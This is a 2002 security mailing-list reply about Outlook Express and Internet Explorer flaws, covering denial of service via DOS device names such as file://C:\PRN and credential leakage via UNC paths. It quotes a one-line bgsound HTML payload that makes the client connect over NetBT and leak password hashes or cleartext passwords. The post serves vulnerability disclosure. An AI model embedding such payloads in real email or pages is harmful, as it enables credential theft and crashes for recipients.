Re[2]: dH team & SECURITY.NNOV: special device access, information leakage and DoS in Outlook Express

From: 3APA3A (3APA3Aat_private)
Date: Fri May 17 2002 - 10:23:42 PDT

  • Next message: Markus Arndt: "Phorum 3.3.2a remote command execution"

    Dear Chad Loder,
    You're right! <bgsound src=3D"\\\new\file.wav"> causes IE
    to    connect    to    via    NetBT.   Depending   on
    LMCompatibilityLevel  it  may  cause user's cleartext password or NTLMv1
    challenge to leak. It's very serious bug.
    --Friday, May 17, 2002, 1:38:16 PM, you wrote to errorat_private:
    CL> At Wednesday 5/15/2002 03:11 PM +0400, you wrote:
    >> Title: Special device access and DoS in Microsoft Internet
    >>        Exporer/Outlook Express/Outlook
    >> All  versions  of  Windows have a reserved filenames referred to special
    >> devices such as prn, aux, nul, etc also called DOS devices.
    CL> This might be related to a vulnerability that was reported to Microsoft
    CL> on Mar 7 2001. See the BugTraq post:
    CL> The META HTTP-EQUIV=REFRESH tag used to do the trick
    CL> from Outlook and other email clients using the MS
    CL> HTML viewer (e.g. Eudora). Redirecting to file://C:\PRN
    CL> was sufficient to hang the browser or email client.
    CL> Microsoft assigned the following internal tracking
    CL> number to the issue: "MSRC 673au", and fixed it in
    CL> MS00-17. Obviously they didn't do a good enough
    CL> job, since you guys found a way to print files, etc. :)
    CL> Another scary thing is that you can cause the computer to connect
    CL> to arbitrary UNC paths, which as you know, involves sending
    CL> NetBIOS credentials over the wire (a good reason to use egress
    CL> filtering).
    CL> +--------------------------------
    CL> Chad Loder <chadat_private>
    CL> Rapid 7, Inc.
    CL> <>
    CL> +--------------------------------
    Существую лишь я сам, никуда не летя. (Лем)

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